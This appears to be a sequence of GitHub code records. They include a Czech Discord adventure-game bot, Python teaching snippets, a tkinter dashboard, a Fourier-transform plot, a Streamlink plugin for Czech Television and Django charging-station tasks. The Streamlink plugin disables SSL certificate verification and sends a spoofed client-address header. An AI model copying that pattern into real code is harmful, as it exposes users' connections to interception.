dojdeme v dialogu tam, kde jsme byli\n while len(position) != 0:\n w = position.pop(0)\n for word, _, _, oth in other:\n word, oth\n if word == w:\n other = oth\n break\n\n for ww, _, resp, oth in other:\n if Special.loud in location.special and response != response.upper():\n await send_with_special(id, \"COŽE? VŮBEC TĚ NESLYŠÍM.\", location.special)\n return False\n\n if (sanitized_response == ww) if Special.loud not in location.special else (response == ww.upper()):\n # speciální akce na konci dialogu (přidávání itemu, minihra,...)\n if resp == [] and type(oth) != list:\n oth(id)\n\n # pokud jsme v minihře, necháme to takhle\n if len(Utilities.get_location_position(id)) > 0 and isinstance(Utilities.get_location_position(id)[-1], int):\n return True\n\n # konec dialogu\n if resp == []:\n Utilities.set_location_position(id, [])\n\n # další část dialogu\n else:\n Utilities.set_location_position(id, Utilities.get_location_position(id) + [ww])\n return True\n else:\n text = \"Neplatná možnost.\"\n if Special.loud in location.special:\n text = text.upper()\n\n await Utilities.get_channel(id).send(text)\n return False\n\n\nasync def send_with_special(id, message, special):\n if Special.loud in special:\n message = message.upper()\n\n if Special.darkness in special:\n # temnota jen pokud už není rozsvíceno\n if Item.rozsviceno.value not in Utilities.get_items(id):\n message = f\"|| {message} ||\"\n\n await Utilities.get_channel(id).send(message)\n\n\nasync def write(id, initial_paragraph=False):\n \"\"\"Vypíše zprávu do kanálu teamu po aktuální interakci.\"\"\"\n location = Utilities.get_location(id)\n position = Utilities.get_location_position(id)\n items = list(Utilities.get_items(id))\n\n if initial_paragraph:\n text = \"\"\"Vítejte v adventuře!\n\n Jste zde v roli elektromagnetické entity, která se nějak dostala do počítače. Nevíte moc, co je to za počítač ani kde se nachází, ale vesmír chtěl, abyste se ocitli právě zde.\n Možná to má něco do činění se zlem, které uvnitř počítače cítíte – něco tu je a nemá tu co dělat. A nedávno se to probudilo po letech spánku. Snad bude víc vědět některá z komponent…\n\n\n Ovládání: <@&835801661417979914>, která vás bude provázet hrou, vám vždy vypíše informace o tom, kde se nacházíte a jaká máte v tuto chvíli možnosti. Každá možnost by u sebe měla mít `zvýrazněno`, jakým\n klíčovým slovem se dá zvolit (v případě čísel je to jen číslo bez závorek okolo). Když toto slovo kdokoliv z vašeho týmu napíše jako zprávu, tak tím vyvoláte danou volbu a <@&835801661417979914> vám\n napíše, kam jste se dostali. V případě, že <@&835801661417979914> nebude rozumět, tak si postěžuje. Občas také můžete potkat jiné speciální aktivity, ale všechny se ovládají stejným způsobem, napsáním\n zprávy v této vaší místnosti.\n\n Nad <@&835801661417979914> bdí ještě <@&838777490217500693> a pokud by vám v některém místě <@&835801661417979914> přestala fungovat, tak může zasáhnout. Pokud by si vašeho problému nevšimla, tak pište do kanálu <#839145972298678352>.\n \"\"\"\n\n paragraphs = text.split(\"\\n\\n\")\n\n message = \"\"\n for paragraph in paragraphs:\n message += \"> \" + \" \".join(map(lambda x: x.strip(), paragraph.split(\"\\n\"))) + \"\\n> \\n\"\n message = message.rstrip(\"> \\n\") + \"\\n\"\n\n await Utilities.get_channel(id).send(message)\n\n if position != None:\n position = list(position)\n\n # jsme-li v minihře\n if len(position) != 0 and isinstance(position[-1], int):\n # úvody miniher\n if location == vysavac:\n await send_with_special(id, f\"**{location.name}**: Super, tak navigujte. Přijímám posloupnosti znaků L/U/R/D podle toho, zda mám jet doleva/nahoru/doprava/dolů.\", location.special)\n return\n\n if location == zdroj:\n msg = f\"**{location.name}**: Nemáš šanci. Začínám; říkej čísla od **1** do **9** podle toho, na jaké pozici chceš položit kolečko.\"\n pos = Utilities.get_location_position(id)\n pos.append(choice(TicTacToe.valid_moves([])))\n msg += \"\\n\" + TicTacToe.show(pos)\n await send_with_special(id, msg, location.special)\n return\n\n if location == sitovka:\n remaining_time = randint(7000, 20000)\n Utilities.get_location_position(id)[-1] = remaining_time\n msg = f\"**{location.name}**: Začínám stahovat. Pojď mezi tím hrát `kámen`/`nůžky`/`papír`! {format_remaining_time(remaining_time)}\"\n await send_with_special(id, msg, location.special)\n return\n\n return\n\n # když vejdeme do lokace\n message = \"\"\n if position is None:\n message += f\"**Nacházíte se {location.at}:**\\n\"\n\n paragraphs = location.description.split(\"\\n\\n\")\n\n for paragraph in paragraphs:\n message += \"> \" + \" \".join(map(lambda x: x.strip(), paragraph.split(\"\\n\"))) + \"\\n> \\n\"\n message = message.rstrip(\"> \\n\") + \"\\n\\n\"\n\n message += f\"-> `Dojít` {location.to},\\n\"\n for i, path in enumerate(paths[location]):\n message += f\"-> `({i + 1})` cestovat {path.to}{',' if i != len(paths[location]) - 1 else '.'}\\n\"\n message = message.strip(\"\\n\")\n await send_with_special(id, message, location.special)\n return\n\n # když se poprvé začneme bavit s komponentou\n for condition, responses, other in location.dialogue:\n if condition(items):\n if position == []:\n if len(responses) == 0:\n message += f\"**{location.name}** nereaguje:\\n\"\n else:\n message += f\"**{location.name}**: {choice(responses)}\\n\"\n\n for l in other:\n message += f\"-> {l[1]}\\n\"\n message += f\"-> Jít `zpět`.\"\n await send_with_special(id, message, location.special)\n return\n break\n\n while len(position) != 0:\n w = position.pop(0)\n for word, _, response, oth in other:\n if word == w:\n other = oth\n break\n else:\n pass\n\n message += f\"**{location.name}**: {choice(response)}\\n\"\n\n for _, sentence, _, _ in other:\n message += f\"-> {sentence}\\n\"\n message = message.strip(\"\\n\")\n await send_with_special(id, message, location.special)\n\n@client.event\nasync def on_ready():\n global data, channels, org_channel, started\n\n for channel in client.get_all_channels():\n # skip voice channels\n if not isinstance(channel, discord.TextChannel):\n continue\n\n # roomy jsou ve formátu team-*\n if channel.name.startswith(\"team-\"):\n data[channel.id] = {\n \"name\": channel.name,\n \"location\": locations.index(motherboard),\n \"items\": [],\n \"location_position\": None}\n\n channels[channel.id] = channel\n\n if channel.name.startswith(\"org-bot\"):\n org_channel = channel\n\n\n@client.event\nasync def on_message(message):\n \"\"\"Volá se, když se někde pošle zpráva.\"\"\"\n global data, started, last_save_time\n\n # save každých 10s\n now = datetime.now()\n if (now - last_save_time).total_seconds() > 10 and started:\n last_save_time = now\n await org_channel.send(\"Automaticky ukládám stav hry.\")\n await save()\n\n # bot neodpovídá sobě!\n if message.author == client.user:\n return\n\n # odpověď na DM, může být něco vtipného\n if str(message.channel).startswith(\"Direct Message\"):\n return\n\n if message.channel.name == \"org-bot\":\n parts = message.content.lower().split()\n\n if len(parts) == 0:\n return\n\n if parts[0] == \"help\" or parts[0] == \"?\":\n await message.channel.send(\n \"**Příkazy:**\\n\"\n \"> `save` – uloží stav hry\\n\"\n \"> `loadiknowwhatimdoing` – nahraje stav hry, přepisujíc ten aktualní\\n\\n\"\n \"> `status ` – vypíše aktuální stav všech teamů / jednoho teamu\\n\"\n \"> `startiknowwhatimdoing ` – začne hru: umožní účastníkům interagovat s botem v kanálech a vypíše startovní message; pokud je specifikován backup, tak se nevypíše úvodní zpráva\\n\"\n \"> `cleariknowwhatimdoing` – vyčistí velký počet zpráv v kanálu orgů a kanálech teamů\\n\\n\"\n \"> `add/remove ` – přidá/odstraní teamu daný item\\n\"\n \"> `move <číslo lokace>` – posune team do dané lokace; od 0 z pole [vysavac, sitovka, motherboard, pamet, zdroj, vetraky, procesor] \\n\"\n \"> `finish ` – vypíše teamu koncovou zprávu\\n\"\n )\n return\n\n if parts[0] == \"save\":\n await save()\n await message.channel.send(f\"Manuálně ukládám stav hry.\")\n return\n\n if parts[0] == \"loadiknowwhatimdoing\":\n load()\n await message.channel.send(f\"Manuálně nahrávám stav hry.\")\n return\n\n if parts[0] == \"finish\":\n if len(parts) == 2:\n for d in data:\n if parts[1] == data[d][\"name\"]:\n paragraphs = end_game_text.split(\"\\n\\n\")\n\n message = \"\"\n for paragraph in paragraphs:\n message += \"> \" + \" \".join(map(lambda x: x.strip(), paragraph.split(\"\\n\"))) + \"\\n> \\n\"\n message = message.rstrip(\"> \\n\") + \"\\n\"\n\n await Utilities.get_channel(d).send(message)\n return\n\n await message.channel.send(f\"Takový team neexistuje.\")\n return\n\n if parts[0] == \"status\":\n if len(parts) == 2:\n for d in data:\n if parts[1] == data[d][\"name\"]:\n await message.channel.send(f\"Data teamu {parts[1]}: \\n```yaml\\n{yaml.dump(data[d], indent=4)}\\n```\")\n return\n\n await message.channel.send(f\"Takový team neexistuje.\")\n return\n\n await message.channel.send(f\"Data teamů: \\n```yaml\\n{yaml.dump(data, indent=4)}\\n```\")\n return\n\n if parts[0] == \"startiknowwhatimdoing\":\n inpar = True\n if len(parts) == 2:\n if parts[1] == \"backup\":\n inpar = False\n\n for id in data:\n await write(id, initial_paragraph=inpar)\n started = True\n return\n\n if parts[0] == \"cleariknowwhatimdoing\":\n await message.channel.purge(limit=10000)\n\n for id in data:\n await Utilities.get_channel(id).purge(limit=10000)\n\n return\n\n if parts[0] in (\"add\", \"remove\", \"move\"):\n try:\n action, id, item = parts\n\n for team in data:\n if data[team][\"name\"] == id:\n id = team\n break\n else:\n await message.channel.send('Team s takovým jménem neexistuje.')\n return\n\n # pro přidávání/odebrání itemu\n if parts[0] != \"move\":\n # test toho, zda item existuje\n Item[item]\n else:\n item = int(item)\n\n if action == \"add\":\n Utilities.get_data(id)[\"items\"].append(item)\n await message.channel.send('Item úspěšně přidán.')\n return\n\n if action == \"remove\":\n if item not in Utilities.get_data(id)[\"items\"]:\n await message.channel.send('Team tento item nemá.')\n return\n Utilities.get_data(id)[\"items\"].remove(item)\n await message.channel.send('Item úspěšně odstraněn.')\n return\n\n if action == \"move\":\n Utilities.set_location(id, locations[item])\n Utilities.set_location_position(id, None)\n\n await message.channel.send(f'Team přesunut do: {locations[item].name}.')\n await write(id)\n return\n\n except ValueError:\n await message.channel.send('Lokace musí být číslo!')\n except KeyError:\n await message.channel.send('Item s takovým jménem neexistuje.')\n except Exception:\n await message.channel.send('Něco se nepovedlo. Je příkaz napsaný správně?')\n\n return\n\n await message.channel.send(f\"Tenhle příkaz neznám.\")\n return\n\n if not started:\n return\n\n # dále ignoruj kanály, které nejsou nějakého z teamů\n if message.channel.id not in data:\n return\n\n # změna stavu podle toho, co účastník napsal\n if await update(message.channel.id, message.content):\n # odpověď, pokud se změna povedla\n await write(message.channel.id)\n\nprint(f'Logging in.')\nclient.run('secret token pro bota')\n","repo_name":"ksp/LARP","sub_path":"larp.py","file_name":"larp.py","file_ext":"py","file_size_in_byte":45701,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24063774881","text":"# def add(x,y):\n# return x + y\n#\n# print(add(5,6))\n# print(add(\"Sohel \",\"khan\").upper())\n\n\n\n\n\nclass Person:\n def __init__(self,name,age,money):\n self.name = name\n self.age = age\n self.money = money\n\n def __add__(self, other):\n return self.age + other.age\n\n\nsakib = Person(\"Sakib Al Hasan\",34,400)\nrakib = Person(\"Rakib Chowdhury\", 40,700)\n\n# my_dict = sakib.__dict__\n# print(my_dict)\n\nprint(sakib + rakib)","repo_name":"arafat-yasin-2413/PYTHON_and_OOP","sub_path":"WEEK -2/OOP from Batch 1/Module 9/1_dunder_methods.py","file_name":"1_dunder_methods.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34613957648","text":"import asyncio\nfrom tkinter import messagebox\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nfrom datetime import datetime\nfrom tkcalendar import Calendar\nimport io\n# from trainee.settings_window import SettingsWindow\n# from trainee.workouts import WorkoutsWindow\nfrom trainee.wordings_list import *\nimport commands\n\n\nclass TraineeDashboard:\n def __init__(self, wind, traineeID, traineeName):\n self.wind = wind\n self.traineeID = traineeID\n self.traineeName = traineeName\n self.root = Toplevel()\n self.root.configure(bg='lightgray')\n self.root.attributes('-fullscreen', True)\n\n # Header Label Container\n Label(self.root, width=1847, height=144, bg='#C2CCF2').place(x=0, y=0)\n\n # Gym logo\n gymPic = Image.open(\"assets/gym.jpg\")\n # Resize image\n gymPic.thumbnail((235, 141))\n test = ImageTk.PhotoImage(gymPic)\n # Positioning the image\n label1 = Label(self.root, image=test)\n label1.image = test\n label1.place(x=0, y=0)\n\n # Daystar logo\n daystarPic = Image.open(\"assets/daystar.png\")\n # Resize image\n daystarPic.thumbnail((235, 141))\n test2 = ImageTk.PhotoImage(daystarPic)\n # Positioning the image\n label2 = Label(self.root, image=test2)\n label2.image = test2\n label2.place(x=142, y=0)\n\n # User welcome\n self.var = StringVar()\n self.var.set(f'Hello {self.traineeName},\\nWelcome back.')\n Label(self.root, textvariable=self.var, bg='#C2CCF2', height=4, width=50, pady=6, font='times 20',\n justify=LEFT).place(x=374, y=0)\n\n # Timedate info\n self.lab1 = Label(self.root, bg='#C2CCF2', height=4, pady=6, font='times 20')\n self.lab1.place(x=1600, y=0)\n\n # Log out function\n self.logoutPic = Image.open('assets/logout.png')\n self.logoutPic.thumbnail((137, 141))\n self.test3 = ImageTk.PhotoImage(self.logoutPic)\n # Button(self.root, text='LOG OUT', image=self.test3, command=self.logout).place(x=0, y=938)\n\n # Left Label Container\n Label(self.root, width=143, height=899, bg='#FBF6F6').place(x=0, y=142)\n\n # Settings button\n # Button(self.root, text='SETTINGS', width=14, padx=13, height=6, command=self.launch_settings).place(x=0, y=142)\n\n # Progress button\n Button(self.root, text='PROGRESS', width=14, padx=13, height=6, command='').place(x=0, y=255)\n\n # Training Container\n Label(self.root, width=1082, height=883, bg='#FFF3C7').place(x=142, y=142)\n\n # # Heading\n # Label(self.root, text='TODAY\\'S TRAINING', bg='#FBF6F6', width=90, padx=4, height=2, font='times 20').place(x=\n\n def run(self):\n self.wind.mainloop()\n\nif __name__ == '__main__':\n root = Tk()\n dashboard = TraineeDashboard(root, 'trainee_id', 'trainee_name')\n dashboard.run()\n\n\n# from trainee_dashboard import TraineeDashboard\n#\n# # create an instance of TraineeDashboard class\n# trainee_dashboard = TraineeDashboard(wind, traineeID, traineeName)\n#\n# # call the show_dashboard() method to display the dashboard\n# trainee_dashboard.show_dashboard()","repo_name":"micckey/Gym_App","sub_path":"oopsdash.py","file_name":"oopsdash.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43612690909","text":"'''\r\nDiscrete Fourier Transform for any function along with\r\nvisualization with matplotlib.\r\n'''\r\n\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport numpy as np\r\n\r\ndelta_t = 0.001\r\nfunction_range = np.arange(-6 * np.pi, 6 * np.pi + delta_t, delta_t)\r\n\r\nt = [t for t in function_range]\r\nf = [(-x if (x < -2) else np.sin(x)) if (x < 0) else x for x in function_range]\r\n\r\ndef get_FT(t, f, w):\r\n f_cos_wt = 0\r\n f_sin_wt = 0\r\n\r\n for t_i in range(1, len(t)):\r\n # F cos(wt) dt\r\n f_cos_wt += f[t_i] * np.cos(w * t[t_i]) * (t[t_i] - t[t_i - 1])\r\n # F sin(wt) dt\r\n f_sin_wt += f[t_i] * np.sin(w * t[t_i]) * (t[t_i] - t[t_i - 1])\r\n \r\n return (f_cos_wt, f_sin_wt)\r\n\r\ndef get_FT_Real(t, f, w):\r\n return get_FT(t, f, w)[0]\r\n\r\ndef get_FT_Imag(t, f, w):\r\n return get_FT(t, f, w)[1]\r\n\r\n\r\ndef generate_FT(t, f, w_start, w_end):\r\n w = np.linspace(w_start, w_end, 1000)\r\n DFT_Real = get_FT_Real(t, f, w)\r\n DFT_Imag = get_FT_Imag(t, f, w)\r\n return (w, DFT_Real, DFT_Imag)\r\n\r\nw, DFT_Real, DFT_Imag = generate_FT(t, f, -3, 3)\r\n\r\nplt.rcParams[\"figure.figsize\"] = (20, 10)\r\nfig = plt.figure()\r\nax = plt.subplot(2, 2, 1)\r\n\r\nax.plot(t, f)\r\nax.set_xlim(xmin=min(function_range)*2, xmax=max(function_range)*2)\r\nax.axhline(0, color=\"red\", linestyle=\"--\")\r\nax.axvline(0, color=\"red\", linestyle=\"--\")\r\nax.set_title(\"Function\")\r\n\r\nax2 = plt.subplot(2, 2, 2)\r\nax2.set_title(\"Fourier Transform\")\r\nax2.plot(w, DFT_Real, color=\"green\", label=\"Real\")\r\nax2.plot(w, DFT_Imag, color=\"blue\", label=\"Imag\")\r\nax2.axhline(0, color=\"red\", linestyle=\"--\")\r\nax2.axvline(0, color=\"red\", linestyle=\"--\")\r\nax2.legend()\r\n\r\nax3 = plt.subplot(2, 2, 3, projection=\"3d\")\r\nax3.plot(w, DFT_Real, DFT_Imag)\r\n\r\nplt.show()\r\n","repo_name":"RelativisticMechanic/Interesting-Python-Scripts","sub_path":"discrete-fourier-transform.py","file_name":"discrete-fourier-transform.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2975347804","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auction', '0027_auto_20161228_0925'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='action',\n name='item',\n field=models.ForeignKey(blank=True, to='auction.Auction', on_delete=django.db.models.deletion.SET_NULL, null=True),\n ),\n ]\n","repo_name":"kwarodom/auction-statistic","sub_path":"auction/migrations/0028_action_item.py","file_name":"0028_action_item.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25010695224","text":"\"\"\"\nPlugin for Czech TV (Ceska televize).\n\nFollowing channels are working:\n * CT1 - https://www.ceskatelevize.cz/porady/ct1/\n * CT2 - https://www.ceskatelevize.cz/porady/ct2/\n * CT24 - https://ct24.ceskatelevize.cz/#live\n * CT sport - https://www.ceskatelevize.cz/sport/zive-vysilani/\n * CT Decko - https://decko.ceskatelevize.cz/zive\n * CT Art - https://www.ceskatelevize.cz/porady/art/\n\nAdditionally, videos from iVysilani archive should work as well.\n\"\"\"\nimport json\nimport logging\nimport re\nfrom html import unescape as html_unescape\nfrom urllib.parse import quote\n\nfrom streamlink.exceptions import PluginError\nfrom streamlink.plugin import Plugin\nfrom streamlink.plugin.api import useragents, validate\nfrom streamlink.stream import DASHStream, HLSStream\n\nlog = logging.getLogger(__name__)\n\n\nclass Ceskatelevize(Plugin):\n\n ajax_url = 'https://www.ceskatelevize.cz/ivysilani/ajax/get-client-playlist'\n _url_re = re.compile(\n r'http(s)?://([^.]*.)?ceskatelevize.cz'\n )\n _player_re = re.compile(\n r'ivysilani/embed/iFramePlayer[^\"]+'\n )\n _hash_re = re.compile(\n r'hash:\"([0-9a-z]+)\"'\n )\n _playlist_info_re = re.compile(\n r'{\"type\":\"([a-z]+)\",\"id\":\"([0-9]+)\"'\n )\n _playlist_url_schema = validate.Schema({\n validate.optional(\"streamingProtocol\"): validate.text,\n \"url\": validate.any(\n validate.url(),\n \"Error\",\n \"error_region\"\n )\n })\n _playlist_schema = validate.Schema({\n \"playlist\": [{\n validate.optional(\"type\"): validate.text,\n \"streamUrls\": {\n \"main\": validate.url(),\n }\n }]\n })\n\n @classmethod\n def can_handle_url(cls, url):\n return cls._url_re.match(url)\n\n def _get_streams(self):\n self.session.http.headers.update({'User-Agent': useragents.IPAD})\n self.session.http.verify = False\n log.warning('SSL certificate verification is disabled.')\n # fetch requested url and find playlist info\n response = self.session.http.get(self.url)\n info = self._find_playlist_info(response)\n\n if not info:\n # do next try with new API\n def _fallback_api(*args, **kwargs):\n self.api2 = CeskatelevizeAPI2(self.session, self.url, *args, **kwargs)\n return self.api2._get_streams()\n\n # playlist info not found, let's try to find player url\n player_url = self._find_player_url(response)\n if not player_url:\n log.debug('Cannot find playlist info or player url, do next try with new API')\n return _fallback_api(res=response)\n\n # get player url and try to find playlist info in it\n response = self.session.http.get(player_url)\n info = self._find_playlist_info(response)\n if not info:\n log.debug('Cannot find playlist info in the player url, do next try with new API')\n return _fallback_api()\n\n log.trace('{0!r}'.format(info))\n\n data = {\n 'playlist[0][type]': info['type'],\n 'playlist[0][id]': info['id'],\n 'requestUrl': '/ivysilani/embed/iFramePlayer.php',\n 'requestSource': 'iVysilani',\n 'type': 'html'\n }\n headers = {\n 'x-addr': '127.0.0.1',\n }\n\n # fetch playlist url\n response = self.session.http.post(\n self.ajax_url,\n data=data,\n headers=headers\n )\n json_data = self.session.http.json(response, schema=self._playlist_url_schema)\n log.trace('{0!r}'.format(json_data))\n\n if json_data['url'] in ['Error', 'error_region']:\n log.error('This stream is not available')\n return\n\n # fetch playlist\n response = self.session.http.post(json_data['url'])\n json_data = self.session.http.json(response, schema=self._playlist_schema)\n log.trace('{0!r}'.format(json_data))\n playlist = json_data['playlist'][0]['streamUrls']['main']\n return HLSStream.parse_variant_playlist(self.session, playlist)\n\n @classmethod\n def _find_playlist_info(cls, response):\n \"\"\"\n Finds playlist info (type, id) in HTTP response.\n\n :param response: Response object.\n :returns: Dictionary with type and id.\n \"\"\"\n values = {}\n matches = cls._playlist_info_re.search(response.text)\n if matches:\n values['type'] = matches.group(1)\n values['id'] = matches.group(2)\n\n return values\n\n @classmethod\n def _find_player_url(cls, response):\n \"\"\"\n Finds embedded player url in HTTP response.\n\n :param response: Response object.\n :returns: Player url (str).\n \"\"\"\n url = ''\n matches = cls._player_re.search(response.text)\n if matches:\n tmp_url = matches.group(0).replace('&', '&')\n if 'hash' not in tmp_url:\n # there's no hash in the URL, try to find it\n matches = cls._hash_re.search(response.text)\n if matches:\n url = tmp_url + '&hash=' + matches.group(1)\n else:\n url = tmp_url\n\n return 'http://ceskatelevize.cz/' + url\n\n\nclass CeskatelevizeAPI2:\n _player_api = 'https://playlist.ceskatelevize.cz/'\n _url_re = re.compile(r'http(s)?://([^.]*.)?ceskatelevize.cz')\n _playlist_info_re = re.compile(r'{\\s*\"type\":\\s*\"([a-z]+)\",\\s*\"id\":\\s*\"(\\w+)\"')\n _playlist_schema = validate.Schema({\n \"CODE\": validate.contains(\"OK\"),\n \"RESULT\": {\n \"playlist\": [{\n \"streamUrls\": {\n \"main\": validate.url(),\n }\n }]\n }\n })\n _ctcomp_re = re.compile(r'data-ctcomp=\"Video\"\\sdata-video-id=\"(?P[^\"]*)\"\\sdata-ctcomp-data=\"(?P[^\"]+)\">')\n _ctcomp_schema = validate.Schema(\n validate.text,\n validate.transform(_ctcomp_re.findall),\n validate.transform(lambda vl: [{\"video-id\": v[0], \"ctcomp-data\": json.loads(html_unescape(v[1]))} for v in vl])\n )\n _playlist_info_schema = validate.Schema({\n \"type\": validate.text,\n \"id\": validate.any(validate.text, int),\n \"key\": validate.text,\n \"date\": validate.text,\n \"requestSource\": validate.text,\n \"drm\": int,\n validate.optional(\"canBePlay\"): int,\n validate.optional(\"assetId\"): validate.text,\n \"quality\": validate.text,\n validate.optional(\"region\"): int\n })\n\n def __init__(self, session, url, res=None):\n self.session = session\n self.url = url\n self.response = res\n\n def _get_streams(self):\n if self.response is None:\n infos = self.session.http.get(self.url, schema=self._ctcomp_schema)\n else:\n infos = self.session.http.json(self.response, schema=self._ctcomp_schema)\n if not infos:\n # playlist infos not found\n raise PluginError('Cannot find playlist infos!')\n\n vod_prio = len(infos) == 2\n for info in infos:\n try:\n pl = info['ctcomp-data']['source']['playlist'][0]\n except KeyError:\n raise PluginError('Cannot find playlist info!')\n\n pl = self._playlist_info_schema.validate(pl)\n if vod_prio and pl['type'] != 'VOD':\n continue\n\n log.trace('{0!r}'.format(info))\n if pl['type'] == 'LIVE':\n data = {\n \"contentType\": \"live\",\n \"items\": [{\n \"id\": pl[\"id\"],\n \"assetId\": pl[\"assetId\"],\n \"key\": pl[\"key\"],\n \"playerType\": \"dash\",\n \"date\": pl[\"date\"],\n \"requestSource\": pl[\"requestSource\"],\n \"drm\": pl[\"drm\"],\n \"quality\": pl[\"quality\"],\n }]\n }\n elif pl['type'] == 'VOD':\n data = {\n \"contentType\": \"vod\",\n \"items\": [{\n \"id\": pl[\"id\"],\n \"key\": pl[\"key\"],\n \"playerType\": \"dash\",\n \"date\": pl[\"date\"],\n \"requestSource\": pl[\"requestSource\"],\n \"drm\": pl[\"drm\"],\n \"canBePlay\": pl[\"canBePlay\"],\n \"quality\": pl[\"quality\"],\n \"region\": pl[\"region\"]\n }]\n }\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n }\n\n data = json.dumps(data)\n response = self.session.http.post(\n self._player_api,\n data=\"data={}\".format(quote(data)),\n headers=headers\n )\n json_data = self.session.http.json(response, schema=self._playlist_schema)\n log.trace('{0!r}'.format(json_data))\n playlist = json_data['RESULT']['playlist'][0]['streamUrls']['main']\n yield from DASHStream.parse_manifest(self.session, playlist).items()\n\n\n__plugin__ = Ceskatelevize\n","repo_name":"Tup0lev/BiliBili_Global_Streaming_Projet_Katyusha","sub_path":"packages/streamlink/plugins/ceskatelevize.py","file_name":"ceskatelevize.py","file_ext":"py","file_size_in_byte":9275,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"31"} +{"seq_id":"10277812789","text":"#-*-coding:utf-8-*-\nfrom __future__ import absolute_import, unicode_literals\n\nimport json\nimport random\nfrom datetime import datetime, timedelta\nfrom time import sleep\nfrom celery import shared_task\nfrom chargingorder.models import Order\nfrom chargingstation import settings\nfrom django.db.models import Q, Max, Count, Sum, F, Min\n#\nfrom echargenet.models import ConnectorInfo, CheckChargeOrder, DisputeOrder\nfrom echargenet.utils import data_encode, get_hmac_md5, EchargeNet, data_decode, get_order_status, \\\n get_equipment_connector_status\nfrom stationmanager.models import ChargingGun\nfrom stationmanager.utils import connect_redis\n\n\n@shared_task\ndef update_pile_status_overtime():\n \"\"\"\n 超时处理\n 电桩状态上报超时,设置电桩状态为离线\n \"\"\"\n r = connect_redis()\n pile_status_dict = r.hgetall(settings.CHARING_PILE_STATUS) # pile_sn, send_time, overtime\n print('update_pile_status_overtime:', pile_status_dict)\n for k, v in pile_status_dict.items():\n pile_sn = k.decode(\"utf-8\")\n v = json.loads(v.decode(\"utf-8\"))\n send_time = v[\"send_time\"]\n over_time = v[\"overtime\"]\n sendTime = datetime.strptime(send_time, \"%Y-%m-%d %H:%M:%S\")\n delta_time = (datetime.now() - sendTime).seconds\n if delta_time > over_time:\n # 更新pile状态 4为离线状态\n ChargingGun.objects.filter(charg_pile__pile_sn=pile_sn).update(work_status=9)\n # 判断充电状态的结束充电\n\n\n@shared_task\ndef notification_start_charge_result(start_charge_seq, connector_id):\n \"\"\"\n 接口名称:notification_start_charge_result\n 使用要求:充电桩实际启动成功或失败后,应立即将启动结果��息同步推送至市级平台e充网,时\n 间应控制在启动命令下发后50秒内\n \"\"\"\n Data = {\n \"StartChargeSeq\": start_charge_seq,\n \"ConnectorID\": connector_id,\n }\n # Ret = 0\n # Msg = \"\"\n try:\n sleep(5)\n order = Order.objects.get(start_charge_seq=start_charge_seq)\n if order.begin_time:\n Data[\"StartTime\"] = order.begin_time.strftime(\"%Y-%m-%d %H:%M:%S\")\n else:\n Data[\"StartTime\"] = datetime.now().strptime(\"%Y-%m-%d %H:%M:%S\")\n\n Data[\"StartChargeSeqStat\"] = get_order_status(order.charg_status_id)\n\n except Order.DoesNotExist as ex:\n Data[\"StartChargeSeqStat\"] = 5\n Data[\"StartTime\"] = datetime.now().strptime(\"%Y-%m-%d %H:%M:%S\")\n # Msg = \"Order Not Exists\"\n\n # encrypt_data = data_encode(**Data) # 数据加密\n # # 数据签名, 用Ret+Msg+Data生成返回签名\n # sig_data = \"{0}{1}{2}\".format(str(Ret), Msg, encrypt_data)\n # ret_sig = get_hmac_md5(settings.SIGSECRET, sig_data)\n # result = {\n # \"Ret\": Ret,\n # \"Msg\": Msg,\n # \"Data\": encrypt_data,\n # \"Sig\": ret_sig,\n # }\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n status = echarge.notification_start_charge_result(**Data)\n if status > 0:\n print(\"推送启动充电结果失败!\", status)\n else:\n print(\"推送启动充电结果成功!\", status)\n\n\n# 定时任务\n@shared_task\ndef notification_equip_charge_status():\n \"\"\"\n 推送充电状态\n 使用要求:充电桩开始充电后,均须每间隔50秒向市级平台e充网推送一次充电状态数据\n :return:\n \"\"\"\n orders = Order.objects.filter(Q(status=None) | Q(status=0) | Q(status=1), start_charge_seq__isnull=False)\n\n for order in orders:\n result = {}\n gun_num = order.gun_num\n ConnectorID = '{0}{1}'.format(order.charg_pile.pile_sn, gun_num)\n gun = ChargingGun.objects.get(charg_pile=order.charg_pile, gun_num=gun_num)\n result[\"ConnectorID\"] = ConnectorID\n result[\"StartChargeSeq\"] = order.start_charge_seq\n\n result[\"StartChargeSeqStat\"] = get_order_status(order.charg_status_id)\n result[\"ConnectorStatus\"] = get_equipment_connector_status(gun.work_status, order.charg_status_id)\n\n # A 相电流 A 相电压\n if order.begin_time is None or order.end_time is None:\n continue\n\n result[\"CurrentA\"] = 0\n result[\"VoltageA\"] = 0\n result[\"Soc\"] = order.end_soc\n result[\"StartTime\"] = order.begin_time.strftime(\"%Y-%m-%d %H:%M:%S\")\n result[\"EndTime\"] = order.end_time.strftime(\"%Y-%m-%d %H:%M:%S\")\n result[\"TotalPower\"] = order.get_total_reading()\n result[\"TotalMoney\"] = order.consum_money\n\n echarge = EchargeNet(settings.MQTT_REDIS_URL, settings.MQTT_REDIS_PORT)\n status = echarge.notification_equip_charge_status(**result)\n if status > 0:\n print(\"推送充电状态失败!\", status)\n else:\n print(\"推送充电状态成功!\", status)\n\n\n@shared_task\ndef notification_stop_charge_result(start_charge_seq, connector_id):\n \"\"\"\n 接口名称:notification_stop_charge_result\n 